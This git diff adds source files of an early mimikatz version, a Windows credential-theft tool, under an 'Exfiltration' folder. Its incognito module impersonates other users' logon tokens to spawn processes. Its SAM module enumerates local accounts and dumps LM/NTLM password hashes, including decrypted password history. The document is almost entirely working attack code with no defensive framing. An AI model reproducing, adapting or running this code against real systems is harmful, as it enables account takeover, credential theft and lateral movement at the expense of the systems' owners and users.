100644 index 0000000..7284da7 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp @@ -0,0 +1,88 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "incognito.h" + +bool searchIncognitoFuncs() +{ + return searchLSAFuncs(); +} + +__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; + monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getTokenData, wstring(L"token"))); + return getLogonData(monPipe, mesArguments, &monProvider); +} + +__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream monStream; + if(searchIncognitoFuncs()) + { + if(!mesArguments->empty() && ((mesArguments->size() == 3) || (mesArguments->size() == 4))) + { + wstring idSecAppHigh = L"0", idSecAppLow = mesArguments->front(), session = mesArguments->at(1), maLigne = mesArguments->back(); + if(mesArguments->size() == 4) + { + idSecAppHigh = idSecAppLow; + idSecAppLow = mesArguments->at(1); + session = mesArguments->at(2); + } + LUID monLUID = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); + DWORD maSession = _wtoi(session.c_str()); + HANDLE monToken; + monStream << L" * OpenTokenByLogonId({" << monLUID.LowPart << L";" << monLUID.HighPart << L"}) : "; + NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(&monLUID, &monToken); + if(NT_SUCCESS(status)) + { + monStream << L"OK !" << endl << + L" * SetTokenInformation(TokenSessionId@" << maSession << L") : "; + if(SetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD)) != 0) + { + monStream << L"OK !" << endl << + L" * CreateProcessAsUser(Token@{" << monLUID.LowPart << L";" << monLUID.HighPart << L"}, TokenSessionId@" << maSession << L", \"" << maLigne << L"\") : "; + PROCESS_INFORMATION mesInfosProcess; + if(mod_process::start(&maLigne, &mesInfosProcess, false, false, monToken)) + { + monStream << L"OK - pid = " << mesInfosProcess.dwProcessId << endl; + CloseHandle(mesInfosProcess.hThread); + CloseHandle(mesInfosProcess.hProcess); + } + else monStream << L"KO - " << mod_system::getWinError() << endl; + CloseHandle(monToken); + } + else monStream << L"KO - " << mod_system::getWinError() << endl; + } + else monStream << L"KO - " << mod_system::getWinError(false, status) << endl; + } + else monStream << L"Format d\'appel invalide : incognito [idSecAppHigh] idSecAppLow sessionDst ligneDeCommande" << endl; + } + return sendTo(monPipe, monStream.str()); +} + +bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) +{ + wostringstream monStream; + if(searchIncognitoFuncs()) + { + HANDLE monToken; + NTSTATUS status = SeckPkgFunctionTable->OpenTokenByLogonId(logId, &monToken); + if(NT_SUCCESS(status)) + { + monStream << L"Disponible !"; + DWORD maSession, tailleRetournee; + if(GetTokenInformation(monToken, TokenSessionId, &maSession, sizeof(DWORD), &tailleRetournee) != 0) + { + monStream << L" - session d\'origine " << maSession; + CloseHandle(monToken); + } + else monStream << L"Indisponible - SetTokenInformation KO : " << mod_system::getWinError() << endl; + } + else monStream << L"OpenTokenByLogonId KO : " << mod_system::getWinError(false, status) << endl; + } + return sendTo(monPipe, monStream.str()); +}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h new file mode 100644 index 0000000..a8eae58 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h @@ -0,0 +1,13 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "../sekurlsa.h" + +bool searchIncognitoFuncs(); +__kextdll bool __cdecl find_tokens(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl incognito(mod_pipe * monPipe, vector<wstring> * mesArguments); +bool WINAPI getTokenData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp new file mode 100644 index 0000000..5555b58 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp @@ -0,0 +1,479 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "sam.h" + +PSAM_I_CONNECT SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(NULL); +PSAM_R_OPEN_DOMAIN SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(NULL); +PSAM_R_OPEN_USER SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(NULL); +PSAM_R_ENUMERATE_USERS_IN_DOMAIN SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(NULL); +PSAM_R_QUERY_INFORMATION_USER SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(NULL); +PSAM_I_FREE_SAMPR_USER_INFO_BUFFER SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(NULL); +PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(NULL); +PSAM_R_CLOSE_HANDLE SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(NULL); +PSAM_I_GET_PRIVATE_DATA SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(NULL); +PSYSTEM_FUNCTION_025 SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(NULL); +PSYSTEM_FUNCTION_027 SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(NULL); + +bool searchSAMFuncs() +{ + if(!(SamIConnect && + SamrOpenDomain && + SamrOpenUser && + SamrEnumerateUsersInDomain && + SamrQueryInformationUser && + SamIFree_SAMPR_USER_INFO_BUFFER && + SamIFree_SAMPR_ENUMERATION_BUFFER && + SamrCloseHandle && + SamIGetPrivateData && + SystemFunction025 && + SystemFunction027)) + { + HMODULE hSamsrv = GetModuleHandle(L"samsrv"); + HMODULE hAdvapi32 = GetModuleHandle(L"advapi32"); + + if(hSamsrv && hAdvapi32) + { + SamIConnect = reinterpret_cast<PSAM_I_CONNECT>(GetProcAddress(hSamsrv, "SamIConnect")); + SamrOpenDomain = reinterpret_cast<PSAM_R_OPEN_DOMAIN>(GetProcAddress(hSamsrv, "SamrOpenDomain")); + SamrOpenUser = reinterpret_cast<PSAM_R_OPEN_USER>(GetProcAddress(hSamsrv, "SamrOpenUser")); + SamrEnumerateUsersInDomain = reinterpret_cast<PSAM_R_ENUMERATE_USERS_IN_DOMAIN>(GetProcAddress(hSamsrv, "SamrEnumerateUsersInDomain")); + SamrQueryInformationUser = reinterpret_cast<PSAM_R_QUERY_INFORMATION_USER>(GetProcAddress(hSamsrv, "SamrQueryInformationUser")); + SamIFree_SAMPR_USER_INFO_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_USER_INFO_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER")); + SamIFree_SAMPR_ENUMERATION_BUFFER = reinterpret_cast<PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER>(GetProcAddress(hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER")); + SamrCloseHandle = reinterpret_cast<PSAM_R_CLOSE_HANDLE>(GetProcAddress(hSamsrv, "SamrCloseHandle")); + SamIGetPrivateData = reinterpret_cast<PSAM_I_GET_PRIVATE_DATA>(GetProcAddress(hSamsrv, "SamIGetPrivateData")); + SystemFunction025 = reinterpret_cast<PSYSTEM_FUNCTION_025>(GetProcAddress(hAdvapi32, "SystemFunction025")); + SystemFunction027 = reinterpret_cast<PSYSTEM_FUNCTION_027>(GetProcAddress(hAdvapi32, "SystemFunction027")); + } + return (SamIConnect && + SamrOpenDomain && + SamrOpenUser && + SamrEnumerateUsersInDomain && + SamrQueryInformationUser && + SamIFree_SAMPR_USER_INFO_BUFFER && + SamIFree_SAMPR_ENUMERATION_BUFFER && + SamrCloseHandle); + } + else return true; +} + +__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream monStream; + monStream << L"** samsrv.dll/advapi32.dll ** ; Statut recherche : " << (searchSAMFuncs() ? L"OK :)" : L"KO :(") << endl << endl << + L"@SamIConnect = " << SamIConnect << endl << + L"@SamrOpenDomain = " << SamrOpenDomain << endl << + L"@SamrOpenUser = " << SamrOpenUser << endl << + L"@SamrEnumerateUsersInDomain = " << SamrEnumerateUsersInDomain << endl << + L"@SamrQueryInformationUser = " << SamrQueryInformationUser << endl << + L"@SamIFree_SAMPR_USER_INFO_BUFFER = " << SamIFree_SAMPR_USER_INFO_BUFFER << endl << + L"@SamIFree_SAMPR_ENUMERATION_BUFFER = " << SamIFree_SAMPR_ENUMERATION_BUFFER << endl << + L"@SamrCloseHandle = " << SamrCloseHandle << endl << + L"@SamIGetPrivateData = " << SamIGetPrivateData << endl << + L"@SystemFunction025 = " << SystemFunction025 << endl << + L"@SystemFunction027 = " << SystemFunction027 << endl; + return sendTo(monPipe, monStream.str()); +} + +__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + if(searchSAMFuncs()) + { + bool sendOk = true, history = true, isCSV = false; + USER_INFORMATION_CLASS monType = UserInternal1Information; + + if(!mesArguments->empty()) + { + isCSV = ((_wcsicmp(mesArguments->front().c_str(), L"/csv") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/csv") == 0); + monType = (((_wcsicmp(mesArguments->front().c_str(), L"/full") == 0) || _wcsicmp(mesArguments->back().c_str(), L"/full") == 0) ? UserAllInformation : UserInternal1Information); + } + + LSA_HANDLE handlePolicy = NULL; + HSAM handleSam = NULL; + HDOMAIN handleDomain = NULL; + HUSER handleUser = NULL; + + LSA_OBJECT_ATTRIBUTES objectAttributes; + memset(&objectAttributes, NULL, sizeof(objectAttributes)); + PPOLICY_ACCOUNT_DOMAIN_INFO ptrPolicyDomainInfo; + + NTSTATUS retourEnum = 0; + PSAMPR_ENUMERATION_BUFFER ptrStructEnumUser = NULL; + DWORD EnumerationContext = 0; + DWORD EnumerationSize = 0; + + PSAMPR_USER_INFO_BUFFER ptrMesInfosUsers = NULL; + + if(NT_SUCCESS(LsaOpenPolicy(NULL, &objectAttributes, POLICY_ALL_ACCESS, &handlePolicy))) + { + if(NT_SUCCESS(LsaQueryInformationPolicy(handlePolicy, PolicyAccountDomainInformation, reinterpret_cast<PVOID *>(&ptrPolicyDomainInfo)))) + { + if(NT_SUCCESS(SamIConnect(NULL, &handleSam, 1, SAM_SERVER_CONNECT))) + { + if(NT_SUCCESS(SamrOpenDomain(handleSam, DOMAIN_ALL_ACCESS, ptrPolicyDomainInfo->DomainSid, &handleDomain))) + { + wstring domainName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); + do + { + retourEnum = SamrEnumerateUsersInDomain(handleDomain, &EnumerationContext, NULL, &ptrStructEnumUser, 1000, &EnumerationSize); + if(NT_SUCCESS(retourEnum) || retourEnum == STATUS_MORE_ENTRIES) + { + for(DWORD numUser = 0; numUser < ptrStructEnumUser->EntriesRead && sendOk; numUser++) + { + wstring monUserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); + ptrMesInfosUsers = NULL; + + if(NT_SUCCESS(SamrOpenUser(handleDomain, USER_ALL_ACCESS, ptrStructEnumUser->Buffer[numUser].RelativeId, &handleUser))) + { + if(NT_SUCCESS(SamrQueryInformationUser(handleUser, monType, &ptrMesInfosUsers))) + { + WUserAllInformation mesInfos = UserInformationsToStruct(monType, ptrMesInfosUsers); + mesInfos.UserId = ptrStructEnumUser->Buffer[numUser].RelativeId; + mesInfos.DomaineName = mod_text::stringOfSTRING(ptrPolicyDomainInfo->DomainName); + + if(mesInfos.UserName.empty()) + mesInfos.UserName = mod_text::stringOfSTRING(ptrStructEnumUser->Buffer[numUser].Name); + + sendOk = descrToPipeInformations(monPipe, monType, mesInfos, isCSV); + SamIFree_SAMPR_USER_INFO_BUFFER(ptrMesInfosUsers, monType); + } + + if(history && SamIGetPrivateData != NULL) + { + sendOk = descrUserHistoryToPipe(monPipe, ptrStructEnumUser->Buffer[numUser].RelativeId, monUserName, domainName, handleUser, monType, isCSV); + } + SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleUser)); + } + else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir l\'objet utilisateur\n"); + } + SamIFree_SAMPR_ENUMERATION_BUFFER(ptrStructEnumUser); + } + else sendOk = sendTo(monPipe, L"Echec dans l\'obtention de la liste des objets\n"); + + } while(retourEnum == STATUS_MORE_ENTRIES && sendOk); + SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleDomain)); + } + else sendOk = sendTo(monPipe, L"Impossible d\'obtenir les information sur le domaine\n"); + SamrCloseHandle(reinterpret_cast<PHANDLE>(&handleSam)); + } + else sendOk = sendTo(monPipe, L"Impossible de se connecter à la base de sécurité du domaine\n"); + LsaFreeMemory(ptrPolicyDomainInfo); + } + else sendOk = sendTo(monPipe, L"Impossible d\'obtenir des informations sur la politique de sécurité\n"); + LsaClose(handlePolicy); + } + else sendOk = sendTo(monPipe, L"Impossible d\'ouvrir la politique de sécurité\n"); + + return sendOk; + } + else return getSAMFunctions(monPipe, mesArguments); +} + +bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV) +{ + wstringstream maReponse; + + switch(type) + { + case UserInternal1Information: + if(isCSV) + { + maReponse << + mesInfos.UserId << L";" << + mesInfos.UserName << L";" << + mesInfos.DomaineName << L";" << + mesInfos.LmOwfPassword << L";" << + mesInfos.NtOwfPassword << L";" + ; + } + else + { + maReponse << + L"ID : " << mesInfos.UserId << endl << + L"Nom : " << mesInfos.UserName << endl << + L"Domaine : " << mesInfos.DomaineName << endl << + L"Hash LM : " << mesInfos.LmOwfPassword << endl << + L"Hash NTLM : " << mesInfos.NtOwfPassword << endl + ; + } + break; + case UserAllInformation: + if(isCSV) + { + maReponse << + mesInfos.UserId << L';' << + mesInfos.UserName << L';' << + mesInfos.DomaineName << L';' << + protectMe(mesInfos.FullName) << L';' << + mesInfos.isActif << L';' << + mesInfos.isLocked << L';' << + mesInfos.TypeCompte << L';' << + protectMe(mesInfos.UserComment) << L';' << + protectMe(mesInfos.AdminComment) << L';' << + mesInfos.AccountExpires_strict << L';' << + protectMe(mesInfos.WorkStations) << L';' << + protectMe(mesInfos.HomeDirectory) << L';' << + protectMe(mesInfos.HomeDirectoryDrive) << L';' << + protectMe(mesInfos.ProfilePath) << L';' << + protectMe(mesInfos.ScriptPath) << L';' << + mesInfos.LogonCount << L';' << + mesInfos.BadPasswordCount << L';' << + mesInfos.LastLogon_strict << L';' << + mesInfos.LastLogoff_strict << L';' << + mesInfos.PasswordLastSet_strict << L';' << + mesInfos.isPasswordNotExpire << L';' << + mesInfos.isPasswordNotRequired << L';' << + mesInfos.isPasswordExpired << L';' << + mesInfos.PasswordCanChange_strict << L';' << + mesInfos.PasswordMustChange_strict << L';' << + mesInfos.LmOwfPassword << L';' << + mesInfos.NtOwfPassword << L';' + ; + } + else + { + maReponse << boolalpha << + L"Compte" << endl << + L"======" << endl << + L"ID : " << mesInfos.UserId << endl << + L"Nom : " << mesInfos.UserName << endl << + L"Domaine : " << mesInfos.DomaineName << endl << + L"Nom complet : " << mesInfos.FullName << endl << + L"Actif : " << mesInfos.isActif << endl << + L"Verouillé : " << mesInfos.isLocked << endl << + L"Type : " << mesInfos.TypeCompte << endl << + L"Commentaire utilisateur : " << mesInfos.UserComment << endl << + L"Commentaire admin : " << mesInfos.AdminComment << endl << + L"Expiration : " << mesInfos.AccountExpires << endl << + L"Station(s) : " << mesInfos.WorkStations << endl << + endl << + L"Chemins" << endl << + L"-------" << endl << + L"Répertoire de base : " << mesInfos.HomeDirectory << endl << + L"Lecteur de base : " << mesInfos.HomeDirectoryDrive << endl << + L"Profil : " << mesInfos.ProfilePath << endl << + L"Script de démarrage : " << mesInfos.ScriptPath << endl << + endl << + L"Connexions" << endl << + L"----------" << endl << + L"Nombre : " << mesInfos.LogonCount << endl << + L"Echecs : " << mesInfos.BadPasswordCount << endl << + L"Dernière connexion : " << mesInfos.LastLogon << endl << + L"Dernière déconnexion : " << mesInfos.LastLogoff << endl << + endl << + L"Mot de passe" << endl << + L"------------" << endl << + L"Dernier changement : " << mesInfos.PasswordLastSet << endl << + L"N\'expire pas : " << mesInfos.isPasswordNotExpire << endl << + L"Peut être vide : " << mesInfos.isPasswordNotRequired << endl << + L"Mot de passe expiré : " << mesInfos.isPasswordExpired << endl << + L"Possibilité changement : " << mesInfos.PasswordCanChange << endl << + L"Obligation changement : " << mesInfos.PasswordMustChange << endl << + endl << + L"Hashs" << endl << + L"-----" << endl << + L"Hash LM : " << mesInfos.LmOwfPassword << endl << + L"Hash NTLM : " << mesInfos.NtOwfPassword << endl << + endl + ; + } + break; + } + + maReponse << endl; + return sendTo(monPipe, maReponse.str()); +} + +WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr) +{ + WUserAllInformation mesInfos; + PSAMPR_USER_INTERNAL1_INFORMATION ptrPassword = NULL; + PSAMPR_USER_ALL_INFORMATION ptrAllInformations = NULL; + + switch(type) + { + case UserInternal1Information: + ptrPassword = reinterpret_cast<PSAMPR_USER_INTERNAL1_INFORMATION>(monPtr); + + mesInfos.LmPasswordPresent = ptrPassword->LmPasswordPresent != 0; + mesInfos.NtPasswordPresent = ptrPassword->NtPasswordPresent != 0; + + if(mesInfos.LmPasswordPresent) + mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedLmOwfPassword.data, sizeof(ptrPassword->EncryptedLmOwfPassword.data)); + if(mesInfos.NtPasswordPresent) + mesInfos.LmOwfPassword = mod_text::stringOfHex(ptrPassword->EncryptedNtOwfPassword.data, sizeof(ptrPassword->EncryptedNtOwfPassword.data)); + break; + + case UserAllInformation: + ptrAllInformations = reinterpret_cast<PSAMPR_USER_ALL_INFORMATION>(monPtr); + + mesInfos.UserId = ptrAllInformations->UserId; + mesInfos.UserName = mod_text::stringOfSTRING(ptrAllInformations->UserName); + mesInfos.FullName = mod_text::stringOfSTRING(ptrAllInformations->FullName); correctMe(mesInfos.FullName); + + mesInfos.isActif = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_DISABLED) == 0; + mesInfos.isLocked = (ptrAllInformations->UserAccountControl & USER_ACCOUNT_AUTO_LOCKED) != 0; + + if(ptrAllInformations->UserAccountControl & USER_SERVER_TRUST_ACCOUNT) + mesInfos.TypeCompte.assign(L"Contrôleur de domaine"); + else if(ptrAllInformations->UserAccountControl & USER_WORKSTATION_TRUST_ACCOUNT) + mesInfos.TypeCompte.assign(L"Ordinateur"); + else if(ptrAllInformations->UserAccountControl & USER_NORMAL_ACCOUNT) + mesInfos.TypeCompte.assign(L"Utilisateur"); + else + mesInfos.TypeCompte.assign(L"Inconnu"); + + mesInfos.UserComment = mod_text::stringOfSTRING(ptrAllInformations->UserComment); correctMe(mesInfos.AdminComment); + mesInfos.AdminComment = mod_text::stringOfSTRING(ptrAllInformations->AdminComment); correctMe(mesInfos.AdminComment); + mesInfos.AccountExpires = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires); + mesInfos.AccountExpires_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->AccountExpires, true); + mesInfos.WorkStations = mod_text::stringOfSTRING(ptrAllInformations->WorkStations); + mesInfos.HomeDirectory = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectory); correctMe(mesInfos.HomeDirectory); + mesInfos.HomeDirectoryDrive = mod_text::stringOfSTRING(ptrAllInformations->HomeDirectoryDrive); correctMe(mesInfos.HomeDirectoryDrive); + mesInfos.ProfilePath = mod_text::stringOfSTRING(ptrAllInformations->ProfilePath); correctMe(mesInfos.ProfilePath); + mesInfos.ScriptPath = mod_text::stringOfSTRING(ptrAllInformations->ScriptPath); correctMe(mesInfos.ScriptPath); + mesInfos.LogonCount = ptrAllInformations->LogonCount; + mesInfos.BadPasswordCount = ptrAllInformations->BadPasswordCount; + mesInfos.LastLogon = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon); + mesInfos.LastLogon_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogon, true); + mesInfos.LastLogoff = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff); + mesInfos.LastLogoff_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->LastLogoff, true); + mesInfos.PasswordLastSet = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet); + mesInfos.PasswordLastSet_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordLastSet, true); + mesInfos.isPasswordNotExpire = (ptrAllInformations->UserAccountControl & USER_DONT_EXPIRE_PASSWORD) != 0; + mesInfos.isPasswordNotRequired = (ptrAllInformations->UserAccountControl & USER_PASSWORD_NOT_REQUIRED) != 0; + mesInfos.isPasswordExpired = ptrAllInformations->PasswordExpired != 0; + mesInfos.PasswordCanChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange); + mesInfos.PasswordCanChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordCanChange, true); + mesInfos.PasswordMustChange = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange); + mesInfos.PasswordMustChange_strict = toTimeFromOLD_LARGE_INTEGER(ptrAllInformations->PasswordMustChange, true); + mesInfos.LmPasswordPresent = ptrAllInformations->LmPasswordPresent != 0; + mesInfos.NtPasswordPresent = ptrAllInformations->NtPasswordPresent != 0; + + if(mesInfos.LmPasswordPresent) + mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->LmOwfPassword.Buffer), ptrAllInformations->LmOwfPassword.Length); + if(mesInfos.NtPasswordPresent) + mesInfos.LmOwfPassword = mod_text::stringOfHex(reinterpret_cast<BYTE *>(ptrAllInformations->NtOwfPassword.Buffer), ptrAllInformations->NtOwfPassword.Length); + + break; + } + return mesInfos; +} + +bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV) +{ + WUserAllInformation mesInfos; + mesInfos.DomaineName = domainName; + mesInfos.UserId = rid; + + DWORD Context = 2, Type = 0, tailleBlob; + PWHashHistory pMesDatas = NULL; + bool sendOk = true; + + if(NT_SUCCESS(SamIGetPrivateData(handleUser, &Context, &Type, &tailleBlob, &pMesDatas))) + { + unsigned short nbEntrees = min(pMesDatas->histNTLMsize, pMesDatas->histLMsize) / 16; + + for(unsigned short i = 1; i < nbEntrees && sendOk; i++) + { + BYTE monBuff[16] = {0}; + + wostringstream userNameQualif; + userNameQualif << monUserName << L"{p-" << i << L"}"; + mesInfos.UserName = userNameQualif.str(); + + if(NT_SUCCESS(SystemFunction025(pMesDatas->hashs[nbEntrees + i], &rid, monBuff))) + { + mesInfos.LmPasswordPresent = 1; + mesInfos.LmOwfPassword = mod_text::stringOfHex(monBuff, 0x10); + } + else + { + mesInfos.LmPasswordPresent = 0; + mesInfos.LmOwfPassword = L"échec de décodage :("; + } + + if(NT_SUCCESS(SystemFunction027(pMesDatas->hashs[i], &rid, monBuff))) + { + mesInfos.NtPasswordPresent = 1; + mesInfos.NtOwfPassword = mod_text::stringOfHex(monBuff, 0x10); + } + else + { + mesInfos.NtPasswordPresent = 0; + mesInfos.NtOwfPassword = L"échec de décodage :("; + } + + sendOk = descrToPipeInformations(monPipe, type, mesInfos, isCSV); + } + LocalFree(pMesDatas); + } + return sendOk; +} + +wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict) +{ + wostringstream reponse; + + if(monInt.LowPart == ULONG_MAX && monInt.HighPart == LONG_MAX) + { + if(!isStrict) + reponse << L"N\'arrive jamais"; + } + else if(monInt.LowPart == 0 && monInt.HighPart == 0) + { + if(!isStrict) + reponse << L"N\'est pas encore arrivé"; + } + else + { + SYSTEMTIME monTimeStamp; + if(FileTimeToSystemTime(reinterpret_cast<PFILETIME>(&monInt), &monTimeStamp) != FALSE) + { + reponse << dec << + setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wDay << L"/" << + setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMonth << L"/" << + setw(4)<< setfill(wchar_t('0')) << monTimeStamp.wYear << L" " << + setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wHour << L":" << + setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wMinute << L":" << + setw(2)<< setfill(wchar_t('0')) << monTimeStamp.wSecond; + } + } + return reponse.str(); +} + +wstring protectMe(wstring &maChaine) +{ + wstring result; + if(!maChaine.empty()) + { + result = L"\""; + result.append(maChaine); + result.append(L"\""); + } + return result; +} + +void correctMe(wstring &maChaine) +{ + unsigned char source[] = {0x19, 0x20, 0x13, 0x20, 0xab, 0x00, 0xbb, 0x00, 0x26, 0x20}; + unsigned char replac[] = {'\'', 0 , '-' , 0 , '\"', 0 , '\"', 0, '.', 0 }; + + for(unsigned int i = 0; i < maChaine.size() ; i++) + { + const BYTE * monPtr = reinterpret_cast<const BYTE *>(&maChaine.c_str()[i]); + for(int j = 0 ; j < min(sizeof(source), sizeof(replac)) ; j+=2) + { + if(*monPtr == source[j] && *(monPtr + 1) == source[j+1]) + { + *const_cast<BYTE *>(monPtr) = replac[j]; + *const_cast<BYTE *>(monPtr + 1) = replac[j + 1]; + break; + } + } + } +}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h new file mode 100644 index 0000000..870aa4d --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h @@ -0,0 +1,210 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "kmodel.h" +#include "mod_text.h" +#include <sstream> +#include <iomanip> + +bool searchSAMFuncs(); +__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments); + +#define SAM_SERVER_CONNECT 0x00000001 +#define DOMAIN_ALL_ACCESS 0x000F07FF +#define USER_ALL_ACCESS 0x000F07FF + +#define USER_ACCOUNT_DISABLED 0x00000001 +#define USER_PASSWORD_NOT_REQUIRED 0x00000004 +#define USER_NORMAL_ACCOUNT 0x00000010 +#define USER_WORKSTATION_TRUST_ACCOUNT 0x00000080 +#define USER_SERVER_TRUST_ACCOUNT 0x00000100 +#define USER_DONT_EXPIRE_PASSWORD 0x00000200 +#define USER_ACCOUNT_AUTO_LOCKED 0x00000400 +#define USER_SMARTCARD_REQUIRED 0x00001000 +#define USER_TRUSTED_FOR_DELEGATION 0x00002000 +#define USER_PASSWORD_EXPIRED 0x00020000 + +typedef struct _WUserAllInformation +{ + unsigned long UserId; + wstring UserName; + wstring DomaineName; + wstring FullName; + bool isActif; + bool isLocked; + wstring TypeCompte; + wstring UserComment; + wstring AdminComment; + wstring AccountExpires; + wstring AccountExpires_strict; + wstring WorkStations; + + wstring HomeDirectory; + wstring HomeDirectoryDrive; + wstring ProfilePath; + wstring ScriptPath; + + unsigned short LogonCount; + unsigned short BadPasswordCount; + wstring LastLogon; + wstring LastLogon_strict; + wstring LastLogoff; + wstring LastLogoff_strict; + + wstring PasswordLastSet; + wstring PasswordLastSet_strict; + bool isPasswordNotExpire; + bool isPasswordNotRequired; + bool isPasswordExpired; + wstring PasswordCanChange; + wstring PasswordCanChange_strict; + wstring PasswordMustChange; + wstring PasswordMustChange_strict; + + bool LmPasswordPresent; + wstring LmOwfPassword; + bool NtPasswordPresent; + wstring NtOwfPassword; +} WUserAllInformation, *PUserAllInformation; + +typedef struct _WHashHistory +{ + DWORD unkVersion; + unsigned short currentLMsize; + unsigned short unkCurrentLMsize; + DWORD unkCurLM; + BYTE EncLMhash[16]; + + unsigned short currentNTLMsize; + unsigned short unkCurrentNTLMsize; + DWORD unkCurNTLM; + BYTE EncNTLMhash[16]; + + unsigned short histLMsize; + unsigned short unkhistLMsize; + DWORD unkHistLM; + + unsigned short histNTLMsize; + unsigned short unkhistNTLMsize; + DWORD unkHistNTLM; + BYTE hashs[24][16]; +} WHashHistory, *PWHashHistory; + +DECLARE_HANDLE(HUSER); +DECLARE_HANDLE(HSAM); 